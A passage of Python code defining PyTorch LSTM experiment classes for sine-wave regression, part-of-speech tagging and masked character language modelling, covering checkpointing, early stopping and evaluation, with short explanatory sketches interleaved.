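    """Negative log-likelihood of the target class — what NLLLoss computes."""
    return -log_probs[target]

# Cross-entropy of one three-class prediction against target class 0.
loss = nll_loss(log_softmax([2.0, 0.5, -1.0]), target=0)
```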
def save_model(self, directory):
torch.save({
'model': self.model.state_dict(),
'delay': self.delay,
'model_layers': self.model_layers,
'bidi': self.bidi,
'seq_length': self.seq_length,
}, directory + '/model_weights.pt')
def save_checkpoint(self, epoch, optimizer, loss, results):
if self.checkpoint_dir is None:
return
torch.save({
'epoch': epoch,
'model_state_dict': self.model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'loss': loss,
'delay': self.delay,
'model_layers': self.model_layers,
'bidi': self.bidi,
'seq_length': self.seq_length,
'results': results,
'wait': self.early['wait'],
}, self.checkpoint_dir + '/checkpoint_epoch_' + str(epoch) + '.tar')
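`torch.save` pickles the checkpoint dict; below is a stdlib sketch of the same save/resume round-trip. A real resume would instead call `torch.load` and then restore state with `model.load_state_dict(ckpt['model_state_dict'])` and the optimizer equivalent.

```python
import os
import pickle
import tempfile

def save_checkpoint(path, epoch, model_state, results):
    """Serialize the training state, analogous to torch.save on a dict."""
    with open(path, "wb") as f:
        pickle.dump({"epoch": epoch,
                     "model_state_dict": model_state,
                     "results": results}, f)

def load_checkpoint(path):
    """Read the dict back; resuming restores model/optimizer state from it."""
    with open(path, "rb") as f:
        return pickle.load(f)

path = os.path.join(tempfile.mkdtemp(), "checkpoint_epoch_0.tar")
save_checkpoint(path, 0, {"w": [0.1, 0.2]}, {"val_loss": [1.5]})
ckpt = load_checkpoint(path)
```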
    def check_early_stop(self, current_loss):
        """Return True when the loss has not improved by min_delta for more
        than `patience` validation checks; always False if patience <= 0."""
        # Early stopping disabled?
        if self.patience <= 0:
            return False
if current_loss - self.early['best_loss'] < - self.early['min_delta']:
self.early['best_loss'] = current_loss
self.early['wait'] = 1
else:
if self.early['wait'] > self.patience:
return True
self.early['wait'] += 1
return False
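The patience logic above can be exercised in isolation. This stand-alone copy mirrors `check_early_stop` (same `min_delta` comparison and `wait` bookkeeping), run here on a loss curve that plateaus after two improvements:

```python
class EarlyStopper:
    """Stop once the loss fails to improve by min_delta for > patience checks."""

    def __init__(self, patience=2, min_delta=1e-3):
        self.patience = patience
        self.min_delta = min_delta
        self.best_loss = 1e15
        self.wait = 0

    def step(self, loss):
        if loss - self.best_loss < -self.min_delta:  # meaningful improvement
            self.best_loss = loss
            self.wait = 1
            return False
        if self.wait > self.patience:
            return True
        self.wait += 1
        return False

stopper = EarlyStopper(patience=2)
flags = [stopper.step(l) for l in [1.0, 0.9, 0.9, 0.9, 0.9, 0.9]]
```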
def run(self):
dataset = self.preload_data("train")
dataloader = DataLoader(dataset, batch_size=self.batch_size, shuffle=True, num_workers=0)
dataset_val = self.preload_data("valid")
dataloader_val = DataLoader(dataset_val, batch_size=self.batch_size, shuffle=False, num_workers=0)
model, loss_function, optimizer = self.model_setup()
self.model = model
self.total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
print('#Parameters', self.total_params)
# Add the learning rate scheduler
if self.lr_schedule:
scheduler = self.schedule = ReduceLROnPlateau(optimizer,
patience=3,
factor=self.lr_schedule,
threshold=1e-2,
threshold_mode='rel',
eps=1e-5,
verbose=True)
results = {'loss': [],
'val_loss': [],
'acc_val': [],
'acc_test': 1e10,
}
clip = 1.0
for epoch in range(self.max_epochs):
# Training
print('Starting Epoch', epoch)
train_loss = []
for i_batch, sample_batched in enumerate(dataloader):
source_orig, targets = sample_batched['input'], sample_batched['output']
# NOTE: We don't need to reset the initial hidden state because the default is to use zero for c0 and h0
model.zero_grad()
output, _ = model(source_orig)
if self.delay == 0:
char_scores = output
else:
char_scores = output[:, self.delay:, :]
total_loss = loss_function(F.log_softmax(char_scores, dim=2).permute([0, 2, 1]), targets)
total_loss.backward()
_ = nn.utils.clip_grad_norm_(model.parameters(), clip)
optimizer.step()
train_loss.append(total_loss.item())
print('Batch', i_batch, 'Loss:', total_loss.item(), 'mean loss', sum(train_loss) / (i_batch+1))
# Validation
model.eval()
total_acc, total_items, total_val_loss = self.eval_model(dataloader_val, loss_function)
results['acc_val'].append(total_acc / total_items)
results['val_loss'].append(total_val_loss)
results['loss'].append(train_loss)
print('Validation ACC: ', total_acc / total_items, ' (out of total_items:', total_items, ')')
print('Validation loss: ', total_val_loss)
model.train()
# Save a checkpoint for reference
self.save_checkpoint(epoch, optimizer, loss_function, results)
# Check LR scheduler
if self.lr_schedule:
scheduler.step(total_val_loss)
# Early stopping?
if self.check_early_stop(total_val_loss):
print('Early stopping at epoch %d...' % (epoch))
break
# Test the trained model
model.eval()
dataset_test = self.preload_data("test")
dataloader_test = DataLoader(dataset_test, batch_size=self.batch_size, shuffle=False, num_workers=0)
total_acc, total_items, _ = self.eval_model(dataloader_test, loss_function)
print('Test ACC: ', total_acc / total_items, ' (out of total_items:', total_items, ')')
results['acc_test'] = total_acc / total_items
return results
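`run()` rescales gradients with `nn.utils.clip_grad_norm_` before each optimizer step; the arithmetic is just a global L2 norm followed by a uniform scale, sketched here on plain lists rather than tensors:

```python
import math

def clip_grad_norm(grads, max_norm, eps=1e-6):
    """Scale all gradient vectors in place so their joint L2 norm <= max_norm.

    Returns the pre-clipping norm, like nn.utils.clip_grad_norm_.
    """
    total = math.sqrt(sum(g * g for vec in grads for g in vec))
    if total > max_norm:
        scale = max_norm / (total + eps)
        for vec in grads:
            vec[:] = [g * scale for g in vec]
    return total

grads = [[3.0], [4.0]]                 # joint norm is 5.0
before = clip_grad_norm(grads, 1.0)    # clip down to unit norm
```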
    def eval_model(self, dataloader, loss_function):
        """Run self.model over a dataloader; returns (correct symbol count,
        total symbol count, mean per-batch loss)."""
total_acc = 0.0
total_items = 0.0
total_loss = 0.0
total_batches = 0
with torch.no_grad():
for i_batch, sample_batched in enumerate(dataloader):
source, targets = sample_batched['input'], sample_batched['output']
batch_size = source.size(0)
# Predict for this batch
output, _ = self.model(source)
# Compute Accuracy for the batch
                # NOTE: the model outputs raw logits; softmax is applied here, not inside the network
if self.delay == 0:
char_scores = output
else:
char_scores = output[:, self.delay:, :]
                # Predict by sampling from the output distribution rather than
                # taking an argmax, which avoids biasing ties when no class dominates.
pred_cat = torch.distributions.categorical.Categorical(logits=char_scores)
predictions = pred_cat.sample()
acc = (predictions == targets).sum().item()
val_loss = loss_function(F.log_softmax(char_scores, dim=2).permute([0, 2, 1]), targets)
total_loss += val_loss.item()
total_acc += acc
total_items += batch_size * self.seq_length
total_batches += 1
return total_acc, total_items, total_loss / total_batches
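`eval_model` samples predictions from `torch.distributions.Categorical` rather than taking an argmax. The per-step mechanics — softmax the logits, then inverse-CDF sampling — in plain Python; the injectable `rng` argument is only there so the sketch is testable:

```python
import math
import random

def sample_categorical(logits, rng=random.random):
    """Draw one class index with probability softmax(logits)."""
    m = max(logits)                       # stabilize the exponentials
    weights = [math.exp(v - m) for v in logits]
    r = rng() * sum(weights)
    for i, w in enumerate(weights):
        r -= w
        if r <= 0:
            return i
    return len(weights) - 1               # guard against rounding at the top end

random.seed(0)
# Two classes with probabilities [0.25, 0.75]; draw a few thousand samples.
draws = [sample_categorical([0.0, math.log(3.0)]) for _ in range(4000)]
```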
class SineExperiment(Experiment):
def __init__(self, dataset_setup, model_layers, delay: int, bidi=False,
batch_size=128, lr=1e-3, lr_schedule=None, max_epochs=50, rnn_units=100,
weight_decay=0, dropout=None, patience=0, data_dir='./data/sin/',
name='', checkpoint_dir=None, device="cpu"):
super(SineExperiment, self).__init__(name)
self.delay = delay
self.model_layers = model_layers
self.batch_size = batch_size
self.max_epochs = max_epochs
self.device = device
self.rnn_units = rnn_units
self.dropout = dropout
self.lr = lr
self.lr_schedule = lr_schedule
self.weight_decay = weight_decay
self.patience = patience
self.bidi = bidi
self.seq_length = None
self.model = None
self.dataset_setup = dataset_setup
self.data_dir = data_dir
self.checkpoint_dir = checkpoint_dir
self.total_params = 0
self.early = {'wait': 0, 'best_loss': 1e15, 'min_delta': 1e-2}
if self.bidi:
self.delay = 0
self.model_layers = 1
elif self.delay > 0:
self.model_layers = 1
def preload_data(self, set_type):
dataset = SineData(set_type,
self.dataset_setup['scale'],
self.dataset_setup['causality'],
self.dataset_setup['acausality'],
self.dataset_setup['sequence_length'],
self.dataset_setup['train_size'],
root_dir=self.data_dir,
device=self.device,
transform=DelayTransform(self.delay, device=self.device))
if self.seq_length is None:
self.seq_length = dataset.length
return dataset
def model_setup(self):
model = None
if self.model_layers > 1:
# This should be a stacked-LSTM
model = MultiLayerLSTMNet(self.model_layers,
1,
self.rnn_units,
1,
bidi=self.bidi,
dropout=self.dropout).to(self.device)
else:
model = SingleLayerLSTMNet(1,
self.rnn_units,
1,
bidi=self.bidi,
dropout=self.dropout).to(self.device)
loss_function = nn.MSELoss().to(self.device)
if self.weight_decay == 0:
optimizer = optim.Adam(model.parameters(), lr=self.lr)
else:
optimizer = optim.Adam(model.parameters(), lr=self.lr, weight_decay=self.weight_decay)
return model, loss_function, optimizer
def save_model(self, directory):
torch.save({
'model': self.model.state_dict(),
'delay': self.delay,
'model_layers': self.model_layers,
'bidi': self.bidi,
}, directory + '/model_weights.pt')
def save_checkpoint(self, epoch, optimizer, loss, results):
if self.checkpoint_dir is None:
return
torch.save({
'epoch': epoch,
'model_state_dict': self.model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'loss': loss,
'delay': self.delay,
'model_layers': self.model_layers,
'bidi': self.bidi,
'seq_length': self.seq_length,
'results': results,
'wait': self.early['wait'],
}, self.checkpoint_dir + '/checkpoint_epoch_' + str(epoch) + '.tar')
def check_early_stop(self, current_loss):
# Early stopping disabled?
if self.patience <= 0:
return False
if current_loss - self.early['best_loss'] < - self.early['min_delta']:
self.early['best_loss'] = current_loss
self.early['wait'] = 1
else:
if self.early['wait'] > self.patience:
return True
self.early['wait'] += 1
return False
def run(self):
dataset = self.preload_data("train")
dataloader = DataLoader(dataset, batch_size=self.batch_size, shuffle=True, num_workers=0)
dataset_val = self.preload_data("valid")
dataloader_val = DataLoader(dataset_val, batch_size=self.batch_size, shuffle=False, num_workers=0)
model, loss_function, optimizer = self.model_setup()
self.model = model
self.total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
print('#Parameters', self.total_params)
# Add the learning rate scheduler
if self.lr_schedule:
scheduler = self.schedule = ReduceLROnPlateau(optimizer,
patience=3,
factor=self.lr_schedule,
threshold=1e-2,
threshold_mode='rel',
eps=1e-5,
verbose=True)
results = {'loss': [],
'val_loss': [],
'mse_val': [],
'mse_test': 1e10,
}
clip = 1.0
for epoch in range(self.max_epochs):
# Training
print('Starting Epoch', epoch)
train_loss = []
for i_batch, sample_batched in enumerate(dataloader):
source_orig, targets = sample_batched['input'], sample_batched['output']
# NOTE: We don't need to reset the initial hidden state because the default is to use zero for c0 and h0
model.zero_grad()
output, _ = model(source_orig)
if self.delay == 0:
filtered_output = output
else:
filtered_output = output[:, self.delay:, :]
total_loss = loss_function(filtered_output, targets)
total_loss.backward()
_ = nn.utils.clip_grad_norm_(model.parameters(), clip)
optimizer.step()
train_loss.append(total_loss.item())
print('Batch', i_batch, 'Loss:', total_loss.item(), 'mean loss', sum(train_loss) / (i_batch+1))
# Validation
model.eval()
total_mse, total_items, total_val_loss = self.eval_model(dataloader_val, loss_function)
results['mse_val'].append(total_mse / total_items)
results['val_loss'].append(total_val_loss)
results['loss'].append(train_loss)
print('Validation MSE: ', total_mse / total_items, ' (out of total_items:', total_items, ')')
print('Validation loss: ', total_val_loss)
model.train()
# Save a checkpoint for reference
self.save_checkpoint(epoch, optimizer, loss_function, results)
# Check LR scheduler
if self.lr_schedule:
scheduler.step(total_val_loss)
# Early stopping?
if self.check_early_stop(total_val_loss):
print('Early stopping at epoch %d...' % (epoch))
break
# check for total convergence
if total_val_loss < 1e-5:
print('Automatic stopping: validation loss is effectively zero')
break
# Test the trained model
model.eval()
dataset_test = self.preload_data("test")
dataloader_test = DataLoader(dataset_test, batch_size=self.batch_size, shuffle=False, num_workers=0)
total_mse, total_items, _ = self.eval_model(dataloader_test, loss_function)
print('Test MSE: ', total_mse / total_items, ' (out of total_items:', total_items, ')')
results['mse_test'] = total_mse / total_items
return results
def eval_model(self, dataloader, loss_function):
total_acc = 0.0
total_items = 0.0
total_loss = 0.0
total_batches = 0
with torch.no_grad():
for i_batch, sample_batched in enumerate(dataloader):
source, targets = sample_batched['input'], sample_batched['output']
batch_size = source.size(0)
# Predict for this batch
output, _ = self.model(source)
# Compute the sum of squared errors for the batch (regression, so no softmax)
if self.delay == 0:
filtered_output = output
else:
filtered_output = output[:, self.delay:, :]
acc = ((filtered_output - targets)**2).sum().item()
val_loss = loss_function(filtered_output, targets)
total_loss += val_loss.item()
total_acc += acc
total_items += batch_size * self.seq_length
total_batches += 1
return total_acc, total_items, total_loss / total_batches
class POSExperiment(Experiment):
def __init__(self, language, char_delay, char_units, char_embeddings, word_delay, word_units, word_embeddings,
pretrained_word_embeddings=False,
model_layers=1, bidi_char=False, bidi_sentence=False,
batch_size=128, lr=1e-3, lr_schedule=None, max_epochs=50,
weight_decay=0, dropout=None, patience=0, data_dir='./data/',
name='', checkpoint_dir=None, device="cpu"):
super(POSExperiment, self).__init__(name)
self.char_delay = char_delay
self.word_delay = word_delay
self.char_units = char_units
self.word_units = word_units
self.char_embeddings_dim = char_embeddings
self.word_embeddings_dim = word_embeddings
self.pretrained_word_embeddings = pretrained_word_embeddings
self.embeddings = None
self.model = None
self.model_layers = model_layers
self.batch_size = batch_size
self.max_epochs = max_epochs
self.dropout = dropout
self.lr = lr
self.lr_schedule = lr_schedule
self.weight_decay = weight_decay
self.patience = patience
self.bidi_char = bidi_char
self.bidi_sentence = bidi_sentence
self.language = language
self.device = device
self.data_dir = data_dir
self.checkpoint_dir = checkpoint_dir
self.total_params = 0
self.early = {'wait': 0, 'best_loss': 1e15, 'min_delta': 1e-2}
if self.bidi_char:
self.char_delay = 0
if self.bidi_sentence:
self.word_delay = 0
self.model_layers = 1
elif self.word_delay > 0:
self.model_layers = 1
def preload_data(self, set_type):
dataset = UD(set_type,
self.language,
root_dir=self.data_dir,
device=self.device,
transform=POSDelayTransform(self.char_delay, self.word_delay, device=self.device))
self.num_chars = dataset.get_num_chars()
self.num_words = dataset.get_num_words()
self.num_pos_tags = dataset.get_num_pos_tags()
self.embeddings = self.load_embedding(dataset)
return dataset
def load_embedding(self, dataset):
if self.pretrained_word_embeddings:
embeddings = dataset.get_embeddings()
self.word_embeddings_dim = embeddings.size(1)
else:
embeddings = None
return embeddings
def model_setup(self):
model = POSNet(self.num_chars, self.char_embeddings_dim, self.char_units,
self.word_units, self.num_words, self.word_embeddings_dim,
self.num_pos_tags, word_embedding=self.embeddings, word_delay=self.word_delay,
bidi_char=self.bidi_char, bidi_sentence=self.bidi_sentence,
device=self.device).to(self.device)
loss_function = nn.NLLLoss().to(self.device)
optimizer = optim.Adam(model.parameters(), lr=self.lr)
return model, loss_function, optimizer
def save_model(self, directory):
torch.save({
'model': self.model.state_dict(),
'char_delay': self.char_delay,
'word_delay': self.word_delay,
'model_layers': self.model_layers,
'bidi_char': self.bidi_char,
'bidi_sentence': self.bidi_sentence,
}, directory + '/model_weights.pt')
def save_checkpoint(self, epoch, optimizer, loss, results):
if self.checkpoint_dir is None:
return
torch.save({
'epoch': epoch,
'model_state_dict': self.model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'loss': loss,
'char_delay': self.char_delay,
'word_delay': self.word_delay,
'model_layers': self.model_layers,
'bidi_char': self.bidi_char,
'bidi_sentence': self.bidi_sentence,
'results': results,
'wait': self.early['wait'],
}, self.checkpoint_dir + '/checkpoint_epoch_' + str(epoch) + '.tar')
def check_early_stop(self, current_loss):
# Early stopping disabled?
if self.patience <= 0:
return False
if current_loss - self.early['best_loss'] < - self.early['min_delta']:
self.early['best_loss'] = current_loss
self.early['wait'] = 1
else:
if self.early['wait'] > self.patience:
return True
self.early['wait'] += 1
return False
def run(self):
dataset = self.preload_data("train")
dataloader = DataLoader(dataset, batch_size=self.batch_size, shuffle=True, num_workers=0)
dataset_val = self.preload_data("valid")
dataloader_val = DataLoader(dataset_val, batch_size=self.batch_size, shuffle=False, num_workers=0)
model, loss_function, optimizer = self.model_setup()
self.model = model
self.total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
print('#Parameters', self.total_params)
# Add the learning rate scheduler
if self.lr_schedule:
scheduler = self.schedule = ReduceLROnPlateau(optimizer,
patience=3,
factor=self.lr_schedule,
threshold=1e-2,
threshold_mode='rel',
eps=1e-5,
verbose=True)
results = {'loss': [],
'val_loss': [],
'acc_val': [],
'acc_test': 1e10,
}
clip = 1.0
for epoch in range(self.max_epochs):
# Training
print('Starting Epoch', epoch)
train_loss = []
for i_batch, sample_batched in enumerate(dataloader):
sentence = sample_batched['input_sentence']
words = sample_batched['input_chars']
targets = sample_batched['output']
sentence_length = sample_batched['sen_length']
words_length = sample_batched['words_length']
batch_size = sentence_length.size(0)
model.zero_grad()
output = model(sentence, sentence_length, words, words_length)
output = F.log_softmax(output, dim=2).permute([0, 2, 1])
# Compute the NLL loss per sentence, restricted to each sentence's actual length.
hidden_dim = output.size(1)
sen_length = sentence_length[0] - self.word_delay - 1
total_loss = loss_function(output[0, :, self.word_delay+1:sentence_length[0]-1].view(1, hidden_dim, -1),
targets[0, 1:sen_length].view(1, -1))
for s in range(1, batch_size):
sen_length = sentence_length[s] - self.word_delay - 1
total_loss += loss_function(output[s, :, self.word_delay+1:sentence_length[s]-1].view(1, hidden_dim, -1),
targets[s, 1:sen_length].view(1, -1))
total_loss.backward()
_ = nn.utils.clip_grad_norm_(model.parameters(), clip)
optimizer.step()
train_loss.append(total_loss.item())
print('Batch', i_batch, 'Loss:', total_loss.item(), 'mean loss', sum(train_loss) / (i_batch+1))
# Validation
model.eval()
total_acc, total_items, total_val_loss = self.eval_model(dataloader_val, loss_function)
results['acc_val'].append(total_acc / total_items)
results['val_loss'].append(total_val_loss)
results['loss'].append(train_loss)
print('Validation ACC: ', total_acc / total_items, ' (out of total_items:', total_items, ')')
print('Validation loss: ', total_val_loss)
model.train()
# Save a checkpoint for reference
self.save_checkpoint(epoch, optimizer, loss_function, results)
# Check LR scheduler
if self.lr_schedule:
scheduler.step(total_val_loss)
# Early stopping?
if self.check_early_stop(total_val_loss):
print('Early stopping at epoch %d...' % (epoch))
break
# Test the trained model
model.eval()
dataset_test = self.preload_data("test")
dataloader_test = DataLoader(dataset_test, batch_size=self.batch_size, shuffle=False, num_workers=0)
total_acc, total_items, _ = self.eval_model(dataloader_test, loss_function)
print('Test ACC: ', total_acc / total_items, ' (out of total_items:', total_items, ')')
results['acc_test'] = total_acc / total_items
return results
def eval_model(self, dataloader, loss_function):
total_acc = 0.0
total_items = 0.0
total_loss = 0.0
total_batches = 0
with torch.no_grad():
for i_batch, sample_batched in enumerate(dataloader):
sentence = sample_batched['input_sentence']
words = sample_batched['input_chars']
targets = sample_batched['output']
sentence_length = sample_batched['sen_length']
words_length = sample_batched['words_length']
batch_size = sentence.size(0)
# Predict for this batch
output = self.model(sentence, sentence_length, words, words_length)
# Compute Accuracy for the batch
# NOTE: Softmax missing at the output of the network
filtered_output = output
output = F.log_softmax(filtered_output, dim=2).permute([0, 2, 1])
hidden_dim = output.size(1)
_, predictions = torch.max(filtered_output, 2)
acc = 0.0
for s in range(batch_size):
sen_length = sentence_length[s] - self.word_delay - 1
acc += (predictions[s, self.word_delay+1:sentence_length[s]-1] == targets[s, 1:sen_length]).sum().item()
total_loss += loss_function(output[s, :, self.word_delay+1:sentence_length[s]-1].view(1, hidden_dim, -1),
targets[s, 1:sen_length].view(1, -1)).item()
total_acc += acc
total_items += (sentence_length - self.word_delay - 2).sum().item()
total_batches += 1
return total_acc, total_items, total_loss / total_batches
class MLMExperiment(Experiment):
def __init__(self, dataset_setup, layers, delay: int, bidi=False, seq_length=180,
batch_size=32, lr=1e-3, lr_schedule=None, max_epochs=50, rnn_units=100, embedding_size=10,
weight_decay=0, dropout=None, patience=0, data_dir='./data/',
name='', checkpoint_dir=None, device="cpu"):
super(MLMExperiment, self).__init__(name)
self.delay = delay
self.model_layers = layers
self.embedding_size = embedding_size
self.batch_size = batch_size
self.max_epochs = max_epochs
self.device = device
self.rnn_units = rnn_units
self.dropout = dropout
self.lr = lr
self.lr_schedule = lr_schedule
self.weight_decay = weight_decay
self.patience = patience
self.bidi = bidi
self.seq_length = seq_length
self.alphabet = None
self.model = None
self.dataset_setup = dataset_setup
self.data_dir = data_dir
self.checkpoint_dir = checkpoint_dir
self.total_params = 0
self.early = {'wait': 0, 'best_loss': 1e15, 'min_delta': 1e-2}
if self.bidi or self.model_layers > 1:
self.delay = 0
if self.delay > 0:
self.model_layers = 1
# percentage of masked elements
self.p = 0.2
def preload_data(self, set_type):
dataset = Text8(set_type,
root_dir=self.data_dir,
length=self.seq_length,
alphabet=self.alphabet,
device=self.device,
output_shift=False,
delay=self.delay,
transform=None)
return dataset
def model_setup(self):
model = None
print('Creating Model delay=', self.delay, ', layers=', self.model_layers, ', units=', self.rnn_units,
', bidi=', self.bidi, ', embedding=', self.embedding_size, 'device=', self.device)
if self.model_layers > 1:
# This should be a stacked-LSTM
model = MultiLayerLSTMNet(self.model_layers,
len(self.alphabet)+1, # +1 for the mask
self.rnn_units,
output_size=len(self.alphabet),
bidi=self.bidi,
embedding_size=self.embedding_size,
dropout=self.dropout).to(self.device)
else:
model = SingleLayerLSTMNet(len(self.alphabet)+1, # +1 for the mask
self.rnn_units,
output_size=len(self.alphabet),
bidi=self.bidi,
embedding_size=self.embedding_size,
dropout=self.dropout).to(self.device)
loss_function = nn.NLLLoss().to(self.device)
if self.weight_decay == 0:
optimizer = optim.Adam(model.parameters(), lr=self.lr)
else:
optimizer = optim.Adam(model.parameters(), lr=self.lr, weight_decay=self.weight_decay)
return model, loss_function, optimizer
def save_model(self, directory):
torch.save({
'model': self.model.state_dict(),
'delay': self.delay,
'model_layers': self.model_layers,
'embedding_size': self.embedding_size,
'rnn_units': self.rnn_units,
'bidi': self.bidi,
'alphabet': self.alphabet,
'dropout': self.dropout,
}, directory + '/model_weights.pt')
def load_model(self, file_name):
state = torch.load(file_name, map_location=lambda storage, loc: storage)
self.delay = state['delay']
self.model_layers = state['model_layers']
self.embedding_size = state['embedding_size']
self.bidi = state['bidi']
self.alphabet = state['alphabet']
self.mask_id = len(self.alphabet)
self.rnn_units = state['rnn_units']
self.model, loss_function, _ = self.model_setup()
self.model.load_state_dict(state['model'])
return loss_function
def save_checkpoint(self, epoch, optimizer, loss, results):
if self.checkpoint_dir is None:
return
torch.save({
'epoch': epoch,
'model_state_dict': self.model.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'loss': loss,
'delay': self.delay,
'model_layers': self.model_layers,
'embedding_size': self.embedding_size,
'alphabet': self.alphabet,
'bidi': self.bidi,
'dropout': self.dropout,
'seq_length': self.seq_length,
'results': results,
'wait': self.early['wait'],
}, self.checkpoint_dir + '/checkpoint_epoch_' + str(epoch) + '.tar')
def check_early_stop(self, current_loss):
# Early stopping disabled?
if self.patience <= 0:
return False
if current_loss - self.early['best_loss'] < - self.early['min_delta']:
self.early['best_loss'] = current_loss
self.early['wait'] = 1
else:
if self.early['wait'] > self.patience:
return True
self.early['wait'] += 1
return False
def run(self):
dataset = self.preload_data("train")
dataloader = DataLoader(dataset, batch_size=self.batch_size, shuffle=True, num_workers=0)
if self.alphabet is None:
self.alphabet = dataset.get_alphabet()
self.mask_id = len(self.alphabet)
dataset_val = self.preload_data("valid")
dataloader_val = DataLoader(dataset_val, batch_size=self.batch_size, shuffle=False, num_workers=0)
model, loss_function, optimizer = self.model_setup()
self.model = model
self.total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
print('#Parameters', self.total_params)
# Add the learning rate scheduler
if self.lr_schedule:
scheduler = self.schedule = ReduceLROnPlateau(optimizer,
patience=3,
factor=self.lr_schedule,
threshold=1e-2,
threshold_mode='rel',
eps=1e-5,
verbose=True)
results = {'loss': [],
'val_loss': [],
'bpc_val': [],
'bpc_test': 1e10,
'val_time': [],
'test_time': 0.0,
}
clip = 1.0
for epoch in range(self.max_epochs):
# Training
print('Starting Epoch', epoch)
train_loss = []
for i_batch, sample_batched in enumerate(dataloader):
source_orig, targets = sample_batched['input'], sample_batched['output']
# Create mask for this batch
batch_size = source_orig.shape[0]
seq_length = source_orig.shape[1]
mask = torch.empty((batch_size, seq_length)).uniform_() <= self.p
source_orig[mask] = self.mask_id
targets[~mask[:, :targets.shape[1]]] = self.mask_id  # unmasked positions are skipped by ignore_index
# NOTE: We don't need to reset the initial hidden state because the default is to use zero for c0 and h0
model.zero_grad()
# We need source_orig to be masked and the masked inputs to be used for the output (loss fun) only
output, _ = model(source_orig)
if self.delay == 0:
filtered_output = output
else:
filtered_output = output[:, self.delay:, :]
total_loss = F.nll_loss(F.log_softmax(filtered_output, dim=2).permute([0, 2, 1]), targets, ignore_index=self.mask_id)
total_loss.backward()
_ = nn.utils.clip_grad_norm_(model.parameters(), clip)
optimizer.step()
train_loss.append(total_loss.item())
print('Batch', i_batch, 'Loss:', total_loss.item(), 'mean loss', sum(train_loss) / (i_batch+1))
# Validation
model.eval()
total_bpc, total_items, total_val_loss, total_times, total_batches = self.eval_model(dataloader_val, loss_function)
results['bpc_val'].append(total_bpc / total_items)
results['val_loss'].append(total_val_loss)
results['val_time'].append(sum(total_times) / float(total_batches))
results['loss'].append(train_loss)
print('Validation BPC: ', total_bpc / total_items, 'bits/char (out of total_items:', total_items, ')')
print('Validation loss: ', total_val_loss)
mu = sum(total_times) / total_batches
print('Avg. runtime p/sequence: ', mu, ' +/- ', np.sqrt(np.sum(np.array(total_times) ** 2 - mu ** 2) / (total_batches - 1)))
print('Max. runtime: ', max(total_times))
print('Total runtime: ', sum(total_times))
model.train()
# Save a checkpoint for reference
self.save_checkpoint(epoch, optimizer, loss_function, results)
# Check LR scheduler
if self.lr_schedule:
scheduler.step(total_val_loss)
# Early stopping?
if self.check_early_stop(total_val_loss):
print('Early stopping at epoch %d...' % (epoch))
break
# check for total convergence
if total_val_loss < 1e-4:
print('Automatic stopping: validation loss is effectively zero')
break
# Test the trained model
model.eval()
dataset_test = self.preload_data("test")
dataloader_test = DataLoader(dataset_test, batch_size=self.batch_size, shuffle=False, num_workers=0)
total_bpc, total_items, _, total_times, total_batches = self.eval_model(dataloader_test, loss_function)
results['bpc_test'] = total_bpc / total_items
results['test_time'] = sum(total_times) / float(total_batches)
print('Test BPC: ', total_bpc / total_items, 'bits/char (out of total_items:', total_items, ')')
mu = sum(total_times) / total_batches
print('Avg. runtime p/sequence: ', mu, ' +/- ',
np.sqrt(np.sum(np.array(total_times) ** 2 - mu ** 2) / (total_batches - 1)))
print('Max. runtime: ', max(total_times))
print('Total runtime: ', sum(total_times))
return results
def run_time_measurement(self, loss_function, repetitions=5):
dataset = self.preload_data("train")
dataloader_test = DataLoader(dataset, batch_size=self.batch_size, shuffle=False, num_workers=0)
overall_times = np.zeros((repetitions,))
model_bpc = np.zeros((repetitions,))
model_loss = np.zeros((repetitions,))
all_nseq = np.zeros((repetitions,))
for j in range(repetitions+1):
# first repetition is not recorded to warm up the device (burn-in time)
out_d = self.eval_model(dataloader_test, loss_function)
if j > 0:
i = j - 1
model_bpc[i], all_nseq[i], model_loss[i], total_times, n_batches = out_d
overall_times[i] = np.mean(np.array(total_times))
if i == 0:
all_batch_times = np.zeros((repetitions, n_batches))
all_batch_times[i, ] = np.array(total_times)
print('model type:,bilstm{},y{}'.format(int(self.bidi), self.model_layers))
print('delay and units:,d{},c{}'.format(self.delay, self.rnn_units))
print('avg runtime per batch:,', np.mean(overall_times), ',', np.std(overall_times))
output = {'test_bpc': model_bpc,
'test_loss': model_loss,
'total_time': overall_times,
'batch_times': all_batch_times,
'n_sequences': all_nseq,
'delay': self.delay,
'model_layers': self.model_layers,
'embedding_size': self.embedding_size,
'bidi': self.bidi,
'n_units': self.rnn_units,}
return output
def eval_model(self, dataloader, loss_function):
total_bpc = 0.0
total_items = 0.0
total_loss = 0.0
total_batches = 0
total_times = []
with torch.no_grad():
for i_batch, sample_batched in enumerate(dataloader):
source, targets = sample_batched['input'], sample_batched['output']
batch_size = source.shape[0]
seq_length = source.shape[1]
mask = torch.empty((batch_size, seq_length)).uniform_() <= self.p
source[mask] = self.mask_id
targets[~mask[:, :targets.shape[1]]] = self.mask_id  # unmasked positions are skipped by ignore_index
# Predict for this batch
start_time = time.time()
char_scores, _ = self.model(source)
end_time = time.time() - start_time
# Compute BPC for the batch
# NOTE: Softmax missing at the output of the network
if self.delay == 0:
bpc, _ = self.bits_per_character(F.softmax(char_scores, 2), targets)
batch_size = float(torch.sum(mask).item())  # count only the masked positions as items
val_loss = F.nll_loss(F.log_softmax(char_scores, dim=2).permute([0, 2, 1]), targets, ignore_index=self.mask_id)
else:
bpc, _ = self.bits_per_character(F.softmax(char_scores[:, self.delay:, :], 2), targets)
batch_size = float(torch.sum(mask).item())  # count only the masked positions as items
val_loss = F.nll_loss(F.log_softmax(char_scores, dim=2).permute([0, 2, 1])[:, :, self.delay:], targets, ignore_index=self.mask_id)
total_loss += val_loss.item()
total_bpc += bpc
total_items += batch_size
total_batches += 1
total_times.append(end_time)
return total_bpc, total_items, total_loss / total_batches, total_times, total_batches
def bits_per_character(self, predictions, targets, divide_result=False):
""" Compute BPC for a tensor of softmax outputs vs expected target values"""
elements = predictions.shape[0]
eps = 1e-8
log2_scores = torch.log2(predictions + eps)
# Build a -1 indicator over the ground-truth indices; the extra column absorbs
# out-of-alphabet (mask_id) targets so they contribute nothing to the BPC sum.
batch_size, seq_length, len_alfa = log2_scores.shape
